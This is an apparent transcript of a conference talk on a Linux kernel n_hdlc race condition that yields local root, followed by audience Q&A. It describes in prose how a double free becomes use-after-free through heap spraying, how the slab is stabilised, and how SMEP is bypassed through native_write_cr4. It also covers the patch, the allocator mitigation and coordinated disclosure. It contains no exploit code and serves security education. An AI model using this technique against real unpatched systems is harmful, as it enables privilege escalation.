 Our next talk will be presented by Alexander Popov. He is a Linux kernel developer specialized in security, and he will tell us about the race for the root and analysis of the Linux kernel race condition exploit. Give him a welcoming, warm applause. Hello. Thanks for coming. I'm Alexander Popov, and the name of my talk is Race for Root. I will tell you about the exploitation of the race condition in the Linux kernel. And first of all, I would like to ask who you have never heard about Linux. Nice. I'm at the right place. So yes, I'm a Linux kernel developer, and I'm a security researcher at positive technologies. The plan of the talk. First of all, I will tell you about the vulnerability, which I found, show the exploit demo video, and then describe the exploits step by step, how to hit the race condition and get double free out of it, how to turn double free into user after free and exploit it, and finally how to bypass SMEP, Supervisor Mode Execution Prevention, without return-oriented programming. I will show another way to do it. And finally, about the defense. This vulnerability is a local privilege escalation flow in the Linux kernel. And it has a race condition in the NHDLC kernel driver. This driver is provided by all major distros. It goes as a loadable kernel module. And that's why all major distros were affected. What is this driver is used for? It is a driver supporting the line discipline for the TTY subsystem, which supports high-level data link control protocol. It is a data link protocol. And its frames can be sent via serial lines. And now it's mainly used for device-to-device communication. And this bug, this particular bug, was introduced quite a long time ago, in 2009. And more than seven years later, the CIScolar fuzzer on my machine gave me a suspicious crush. CIScolar is a really good project. You should check out it. It allowed to make Linux kernel code much better. And several days after that, I had a stable race condition repro, and then was a very intensive working time. And at the end of the month, I had an exploit proof of concept and the patch fixing this particular bug. Then at the end of February, I contacted security at kernel.org. And several days after that, all major distros, which were affected, were informed about this vulnerability. And they were giving my patch was provided to them. The 7th of March was the end of embargo, and I announced this vulnerability on the public mailing list. And at that particular day, distros provided the kernel update for Linux. And several weeks after that, I published a write-up about that vulnerability. And currently, there is a patch from me to a Linux kernel mainline, which allows to block similar attacks. And it is now discussed in the Linux kernel mailing list. What was wrong in the code? First of all, the original driver used some self-made single-link list to store the buffers for sending the line. And it used a special variable, tbuff, to store the pointer to a buffer, which we need to resend in case of transmit error. It was quite fine. But later in that commit, the buffer flushing feature was added. And it introduced racy access to tbuff variable. Now, the sending function and flushing function can put this particular buffer to the free list twice. And it went under some wrong locking. And when you close the showDeterminal later, the release function can free this buffer twice, which is a double-free error. It is really dangerous, as it looks. And now I'll show the demo how to get root out of it. It was a fresh Linux Meet installation. Now I'm showing that the machine, which I used to run the exploit, didn't have SMAP feature, which stands for Supervisor Mode Access Prevention. I'll give the details later. But this machine has SMEP feature. You can see it. Now I show that I'm going to run this exploit as an unprivileged user. Now showing the code, censored a little bit against the script kitties, then compile and run. The exploit is really stable. It doesn't crush the kernel. And it gets the root really fast. So that's it. Now I will describe the exploit step by step, what I've done to do that. And the main steps are, first of all, prepare the environment for the race, to get the race condition. Then hitting this race condition and getting double-free. Then heap spraying number one to turn this double-free into use after free, which is exploitable. And heap spraying number two to exploit this use after free. Finally, heap stabilization for turning system into initial state. If we didn't hit the race condition, we should start the exploit once again. I mean, go to the next iteration of the exploit. And finally, I will show a new way how to bypass SMEP defense feature without return-oriented programming. Quite simple and nice. Now, first, prepare for the race. First of all, I'll show what is how the pseudo-terminal works and where the vulnerable driver works in this diagram. So pseudo-terminal is created when we open the pseudo-terminal master side and get the file descriptor from it. The terminal emulator works on this side, on the master side. And the program which is run in this pseudo-terminal is running at the slave side. And the main logic is happening here in the line discipline. Line discipline is a piece of kernel code which provides the logic like clearing the last character if you hit backspace or echoing the input which you just put to the pseudo-terminal back to exterm, for example. And the vulnerable driver and HDLC driver is providing the HDLC line discipline. And we will going to exploit this particular part. So to prepare for the race, first we stick to one single CPU to make all the vulnerable driver memory allocations going on on the single allocator cache, which are allocator caches per CPU. And we want to have all the work done in one cache. So then we open, as I said, we open the pseudo-terminal master side and the pseudo-terminal master and slave pair is created. Then we set the line discipline for this pseudo-terminal and the vulnerable module is automatically loaded. We can now exploit it. Then, as I said, the race condition happening between sending and flashing in case of previous sending error. And to make this, I suspend the pseudo-terminal output and the buffer which I put in it, sending is failed. And the pointer to it is saved to tbuff variable. Now we are ready for the race. And we allow the threads of our exploit work on all CPU and compete to each other. Now the racing itself. First thread will flush the data. It will call this iocontrol. And the second thread will start the suspended output. And it will try to send the buffer, which is stored at tbuff race variable. And it turned out that introducing legs in these threads make the whole exploit work faster and hit the race condition earlier. So what do threads do? First, they synchronize at pthread barrier. You see it on the left hand side. And then one of the threads, for example, flashing thread is spinning in a busy loop. But another thread already starts the communication with the vulnerable driver. And then at this special moment, they both use the tbuff variable. And we have the race condition here. I might have said that race condition is such situation in the system when the result of the computing depends on the order of the operations. So it is some non-deterministic situation in the system. And here, the result of working with tbuff variable depends on how the threads collide. For choosing the leg length, I used this code. So legs are introduced in turn for second thread, for first thread, for second thread. And it is growing. And it is maximized by 50 milliseconds. Microseconds, yes. And that makes the exploit go faster. And threads collide earlier. We have faster exploit. Now, triggering actual double free. We stick to the first CPU core again and close the pseudo terminal. And the release function here works and frees the buffers in the free list. If we had the race condition, we have double buffer and have double free. And kernel address sanitizer can detect it. And the report of the kernel address sanitizer was, in fact, the report from CIScolar, which I got and after that, I started to investigate this ischia. Now we need to exploit the double free. We try to do it. And if we got the root ID, we run the shell. Otherwise, go and race again. Now I want to show you how double free exploitation works in general. The idea is quite beautiful, I would say. First, we allocate some object. And later, it is freed. It's fine. But we have an error. We have the second freeing of this object A. And we will use it. Now we allocate another object, which has the same size. And the kernel allocator, for example, tends to give you the same address that has been already freed, just freed. Because it can be accessed very fast. It was just used. So we allocate our object B at the same place, here. But here, the second freeing, the bug, buggy freeing of the first object A happens. And it actually frees the object B. So now, after the object B is freed, we can do the heap spraying number two. We allocate another object of the same size. It is put at the place of object B. But it has our controllable payload. And then, the code which actually uses the object B will work with the payload of object X and can do a malicious activity. That is the main idea of exploiting double free. So first, heap spraying to turn double free into use after free. And using the object B is the exploitation of this use after free era. Now, about this particular exploit. The buffer which we are exploiting is allocated in that slab cache. Linux kernel allocator is called slab allocator. It prepares several objects of the same size, say, 8 kilobytes, and is ready to give them this object to the code which calls the K maloc. So we will exploit double free in this particular cache. So we need two types of objects. First object for first heap spraying, which has a function pointer. And the second one with a controllable payload to override this function pointer and run our shell code. And it turns out that socket buffer in the Linux kernel works very well as a first object. It has a function pointer, which we can override. It can be allocated in the needed cache. And I would say that it is the object for storing network frames in the Linux kernel. So the actual network data is stored here. And struct SKBoof stores the meta information. But it turned out that first heap spraying, the overwriting of the double free object doesn't work so simple because the release function frees 13 buffers straight away. There are 13 buffers in the list in the HDLC driver. And it frees it straight away. And all of them are put to the free list of the allocator. And it turns out that the double freed item is at the beginning of the free list. And it's not easy to get it back again. I was trying to create some network packet between the double freed at the beginning of this free list. But I didn't succeed because this HDLC release function goes on a single CPU and doesn't interrupt, is not interrupted. So still puzzled anyway. But if we look carefully, we see that this function which freezes the buffers doesn't crash the kernel. And that means that the kernel allocator accepts consecutive ring of the same address, of the same buffer. It is strange. It is naive, but that's it. So if I spray after the release function, I can get the buffers from the free list one by one. And finally, have such a cool situation. When I have two socket buffers pointing to the same data, and it is very nice because if we receive one of these buffers, we can have a use after free on the second one. Really nice. So for turning double free into use after free, I spawn a lot of 8 kilobytes UDP packets after the release and keep them allocated in the kernel memory. It's not easy because the socket queue for network packets is limited in size. And that's why I have a lot of socket queues not to overflow them and keep all my packets in the kernel memory. And then I receive one of the twin socket buffers and have a use after free error on another one. That's nice. So the hip spraying implementation looks like that. I have 200 server sockets for the hip spray and send packets to them. And empirically, I know which packets are likely to point to the same data. I send it to a dedicated server circuit to have a use after free error later on it. And then after receiving some packets from the dedicated server circuit, I need to return the state of the allocator to the initial position, not to crush the kernel. That's why I send some packets to other 200 server sockets to exhaust the partially freed slabs with slab objects in the kernel allocator and start from scratch the next round of the racing and the next round of the exploit. So first hip spraying already done. Now we need to, now we need, after receiving one of twin packets, override the contents of the second one to have a local privilege escalation. So now we are focused on the second hip spraying and executing the shell code. Hip spraying number two should override destructor arc in the socket buffer. And another socket buffer doesn't work for that because the structure with the data which we want override is put at the same offset from the beginning all the time, so we don't control it. That's why I needed another kernel object to override the destructor. And I was searching for it for a long time. I tried a lot of kernel objects. And finally I found that add keys is called can store the controllable payload in the kernel memory and can be allocated in the cache which I'm interested in. Nice. So let's see how the destructor is used. If the packet has this particular flag and the destructor is not null, our callback is called. So the second hip spraying should override the data and put this particular flag and override the destructor to our payload which is allocated in the user space. So UBOOF enforced structure with the callback is allocated in the user space and the shell code is also in the user space memory. And here when the destructor pointer will be de-referenced, the SMAP can block our exploit. Again, SMAP is a supervised memory access prevention. And it gives a fault if you de-reference the pointer which points to user space memory in the kernel space. There are some techniques how to bypass it. And in my particular exploit, I will bypass the second defense feature. It is called SMEP, which is Supervisor Memory Execution Prevention. The processor gives a fault if the CPU instruction is fetched from the user space address at the kernel space. And I will show how to bypass that one. But it turns out that hip spraying number two to override the network packet doesn't go so easy because we have so-called key data quotas. They are controlled by root. And the maximum size of our payload, which we can have in the kernel space, is only 2,000 bytes. That means that we can call only two ad-kisses calls, which will succeed. And it's not enough for spraying. So puzzled again. But then I saw the bright idea in the slides of Dishan from Kin Security Lab. Thanks to him for that work. It turns out that successful hip spraying doesn't depend on the success of the syscall, which you call. So I allow my ad-kisses call fail. But the payload is actually was in the kernel memory. And it could override the socket buffer. That's fine. So just allow it to fail. So final spraying implementation looks like that. 20 packets to the server sockets for spraying. Then empirically, I understood that packets number 12, 13, 14, and 15 are likely to be doubled, to point to the same data. And I send it to the dedicated server socket to receive later. And I receive these four packets one by one and call some ad-kisses calls in between to override the second twin socket buffer. Finally, after receiving, so receiving is free. I restore the initial state of the allocator by sending these 15 additional packets to another service. And it is the main thing which makes the exploit be so stable. Without that, we have a kernel crash when the slab is fully freed. And it detects that it had double free in it. So to avoid this kernel crash and make our exploit work, we should restore and this technique called slab exhaustion. And there are examples of working with ad-kisses call. This one is for storing our payload in the kernel space and the invalidation for first two ad-key calls, which succeed. So finally, about bypassing SMEP. I'm showing that again. When the kernel tries to execute the instruction at the user space, we have a fault. And there are several, first of all, I'll say that it is not software but hardware feature. The x86 CPU provides it. And it is controlled at the 20th bit of CR4 register. So if we can write to this register and set this bit, this particular bit to zero, we have that feature disabled. And there are several ways how to bypass it, already known in public. You can look at it later. They are quite complex because the first one uses return arrays in programming. And both of them need the arbitrary memory right to bypass SMEP and SMAP. And I will show another easy way. It turns out that the kernel already had the needed function. There is a native write CR4, which just writes its argument to CR4 register. And let's look more carefully how the destructor is used. The callback is called with the address of Ubufin 4 structure as the first argument, which is also long. So if I use native write CR4 at the callback, and if I recite Ubufin 4 at the memory which was got from MMAP system call, and if our Ubufin 4 recites at this particular address, the SMEP is disabled because this particular address is the right value of CR4 register without SMEP enabled on my machine. So just a map, put the payload on it, and have the SMEP disabled. Everything is already ready in the kernel. And after SMEP disabled, I can race again to execute the shell code on the second successful exploit iteration. And I would like to add that the correct value of CR4 register is machine specific, but it can be determined from the user space by CPU ID instruction on x86. Finally, about the fix. As I said, I approached the mainline maintainers with the patch for this race condition, and it uses just standard kernel link lists instead of those self-made. And I got rid of the racy tbuff variable. And if the sending fails, the buffer which was not sent is just put at the head of the queue to send it later, for sending it later. And as I showed you, the kernel locator behaves quite strange, allowing the consecutive freeing of the similar addresses. And for example, GNU-C library has so-called fast stop check. When we free another object and put it to the free list, we check that the address of that object is not equal to the previous freed object. So I did the same for the mainline, and it's quite cheap. It is a check which can block the double free exploitation. And currently, it is discussed in the Linux kernel mailing list. And I hope that it will get to the mainline behind this particular config option. So they didn't allow me to put it by default to the kernel. That's all. And I would really appreciate your questions. I have nice souvenirs for best questions. Thank you very much, Alexander. And indeed, we have a lot of time for questions. So please go to the center of the stage, where you will find microphones, and post your questions, please. Hi. You said that the Linux kernel maintainers did not want to add the mitigation by default. Why? Thanks for the question. First of all, they already have all the corresponding checks in the slab debug feature. If you run your kernel with slab debug in the kernel parameters, the allocator checks, whether it has double free or other errors, for example, allocator metadata corruption. So they didn't want to have the same feature in two places. But the problem is that the default kernel, which distro provides, doesn't have this option. And so the allocator just accepts freeing the same address twice. Did they provide any solutions for the fact that nobody ships with this enabled? They allowed me to have this check under the specific kernel config option. And I hope that several distributions, which want to provide security for the users, will use this option. This particular option has a nice feature. It randomizes the address of the items in the free list. So if the attacker has the heap overflow exploit and he wants to override the next pointer in the free list, it will have to guess the cookie, which is unique for all CPU, all allocator caches. And I hope that my check will be also included in this config option. All right, thanks. Thank you. Next question, please. Hi. Do we understand correctly that this only works if you have both the user space and kernel space in the same mapping? So if you have the kernel that does not map user space in the same other space as the kernel, would this still work? Some architectures don't map the user space in the kernel other space. Linux has it by design right now. So on Intel, you map kernel and user space in the same other space. But you map the kernel, you mark the kernel as kernel so that the user space cannot access it. But some other architectures don't do that. Yes. On x86, the segmentation is not used. It is historically like that. So it is all mapped. Yeah, but not all architectures do that. Yes. For example, JR Security Puchset has so-called UDRF feature, which uses the segmentation and helps against this attacks. It's not about segmentation. I'm talking like all architectures, not on Intel, like, I don't know, that where you don't have the user space mapped in the same other space of the kernel. Do you know whether it's like that for ARM? Is it for Linux? Maybe, I don't know about ARM. So would your exploit still work if you don't have the user space in the same other space as the kernel? Maybe some return-oriented programming will help against it. But the technique which I showed, Vitaly Nikolenko, provided it, it also maps, it is called stack pivoting when you move your kernel stack onto user space memory. And then the kernel stack is controlled, and you can do whatever you want with return-oriented programming. But it also uses this fact that the user space memory is mapped at the kernel space. The kernel, when you run this system call, the kernel works in the kernel space on behalf of the process which called this call. So my exploit is the user space program. It calls some system calls, and the kernel works on behalf of the exploit in the kernel space. So the kernel, when it executes a system call, knows which process asked for that. And that need to work. And if we don't map user space memory to the kernel space, we should provide this feature. The kernel should know which process is executed right now. Thank you. More questions from the audience. You have an specialist. Please come to the mic. Hi. Hi. Could you tell some more about the process of informing the Linux kernel or the other Linux kernel developers and the distros, et cetera? Because in the beginning of your talk, you gave the timeline. Yes. And it took a couple of days. So can you tell how it worked? Did it work smoothly? Were there any issues, et cetera, et cetera? Yes. Thank you for the question. First, I contacted security at kernel.org. And it took us some time to understand that their vulnerability is serious because it affects all major distros affected. At first, the maintainers didn't get that this option is enabled on all distros. And three days later, one of the kernel security engineers contacted the distros and described the vulnerability. My patch, which I sent to security at kernel.org, was sent to the distros. But there was some additional work needed because all stable kernel release was also affected because the vulnerability was introduced in 2009, as you see. So quite a long time ago. So not only all major distros was affected, all stable kernel releases was affected as well. And some of them didn't have their today's standard kernel linked lists. So I worked with distros developers and to provide a patch which will work, which will fix the issue on the old stable kernel releases. And the embargo, which I noticed, is the special date when I'm allowed to share the information about this vulnerability. And at this particular date, the distros give the kernel update for their users. So it happens almost simultaneously to decrease the chances of blackheads to attack this vulnerability in case they can reproduce the bug and write the exploit very fast. So that's why security researchers usually don't give the exploit straight away but wait for some time, exploit proof of concept I mean. But they wait for some time to allow all distros users update their systems. Of course, unfortunately, not all people do that. Not all people update their systems and they stay vulnerable. And when I wrote to security at kernel.org, the security engineers, maintainers, got CVE ID themselves. Now it has changed. There is a special organization called Mitra, which gives the CVE numbers to the vulnerabilities. And now you should contact Mitra yourself, describe the vulnerability, show the impact, and you will get the CVE identifier for this vulnerability. So now it is your responsibility to get this number. And this number is important because it helps to track whether your system has all current security updates. It helps to understand whether you have all recent patches for the vulnerabilities. That's it. Thank you for the question. Thank you very much. Someone else, more questions from the public? No? I would like to continue on that question. Who sets the time for embargo? Kernel maintainers, they, in collaboration with the distros, decide how much time do they need to fix the issue and to prepare the new kernels for the users? What if they guess wrong this time of embargo? They can also update? Straight away? So change, let's say, we need one more month or one more week, I don't know. It doesn't look good to stay vulnerable if the information about the vulnerability is already available. So as you saw, less than a week, and all distros provided the patch. Next question, please. The man behind at the back first, sorry. What means you, hello? What measures does the kernel take in order to prevent falling on the same stone twice? Could you repeat, please? Yes. What measures is the kernel taking in order to prevent stepping on the same stone twice? If I understood you right, you are asking, what did I do to prevent double freeing, right? No. I'm asking, how does the kernel? Get closer to the mic, please. I'm asking, how does the kernel prevent this from happening again? Ah, you mean this particular bug, the race condition? Or this particular class of bugs or problems? There is no general defense against the race condition. The proper defense is proper code with proper locking. And yes. And the result of the race condition can be different. In this particular case, it was double free. And it can be detected. For example, slab debug option for the kernel makes the kernel drop the second freeing of the same item. So on every freeing, it goes through the free list in the allocator and drops the current freeing if we already freed this item. And I can't say that I like it very much, because if double free happened, that means that the bug already was hit somewhere in the kernel. It's already bad. So maybe it is not good to trust the process which caused this double free error. But anyway, slab debug provides that. There are, maybe there are other defenses against the results of the race conditions. But I, ah, yes, there is the nice project called Thread Sanitizer. You may have heard about that. It is a brother of kernel address sanitizer, and so on. And it provides some compile time instrumentation to detect the race conditions, the race access to some memory. It stores the meta information about the memory in a separate place, and just check it all the time when you have the access. It doesn't work very fast. But anyway, it can be used for debugging the kernel. And that it is not currently in the mainline, because it has a lot of false positive errors. But anyway, you can apply the patch and try to run your kernel with this debug option and see all the reports and fix the code. So it is a debugging feature, Thread Sanitizer. Thank you for your question. I have the question, is it exploitable on the AMD64? And the second question is, when it will be, like, ScriptKiddy's version will be available. OK, yes, it can be exploited on AMD, sure. And I already wrote a detailed write-up about this vulnerability and the exploit. It has some part of the code. And this talk provided some details. I didn't really want to give the full exploit, because there are anyway a lot of out-of-date kernels on the systems of different people. Sometimes people say, just, we have defended the perimeter of our network. It's fine to have out-of-date systems inside. So that's why I don't give the full exploit. Thank you. Next question, please. Since this bug is in such a hot path, do you think it is possible to life-patch it? Life-patch it? Yes. Thanks for your question. While working on the fix with the distros, I was contacted with a developer from Oracle. They have some life-patching subsystem. And we were working on some really small fix, which can be applied with that. These life-patches are working as the kernel modules. You just load this patch module into your kernel. And the code paths are fixed. But it should not be really big. That's why we work to make it as small as we can to life-update the systems. You're talking about case-poise. I'm talking about k-patch, the vanilla kernel life-patching mechanism. Yes. Both of them can do it. Thank you for your question. Question in the front, please. I have another question for you. You said somewhere near the start of the presentation that the cause of this was homegrown linked list implementation. I can imagine that a lot of these homegrown implementations are going to be wrong in some way. How common are these in the Linux kernel, homegrown implementations of something that should really be using a standardized kernel implementation? I would say that this particular driver is quite old, and it was not used very intensively. So it is not some kernel code which has a lot of developers looking into it. And there are a lot of such code in Linux kernel. It has more than 20 million strings of code, as I remember. So it's quite big. But this particular bug, I was lucky to find it because it was enabled on all distros. So I guess it can be possible to write a simple program which finds the oldest code which your distro provides you. And for example, Fazit. All right, thanks. Thank you. Question in the back, please. Yes, I'd like to hear more about how this bug was detected in the first place. One of your early slides said that somebody contacted you. Do you have more information how this was originally detected, and why it came to you? Originally, it was detected on my system. So I ran C-scolar, the father, on my machines and got the suspicious crush. That suspicious, then I investigated why this crush happened. And the cool feature about C-scolar, it can provide C-program which reproduces this crush. It just calls a lot of C-scalls on a virtual machine. And then you can run the result again. So you can reproduce the bug again and see this particular crush. And then after I had a stable repro, I started to investigate how to exploit it, not to have a crush, but have a root. And so it all happened on my machine. And you can install and use C-scolar too. It's quite easy. And they have a nice wiki on GitHub. So I really like people who develop it. Thank you. More questions from the audience. You can still enjoy about seven minutes of open question time. Nobody else? Well, in that case, I will close the session. Thank you very much, Alexander. Thank you very much. A big round of applause for him.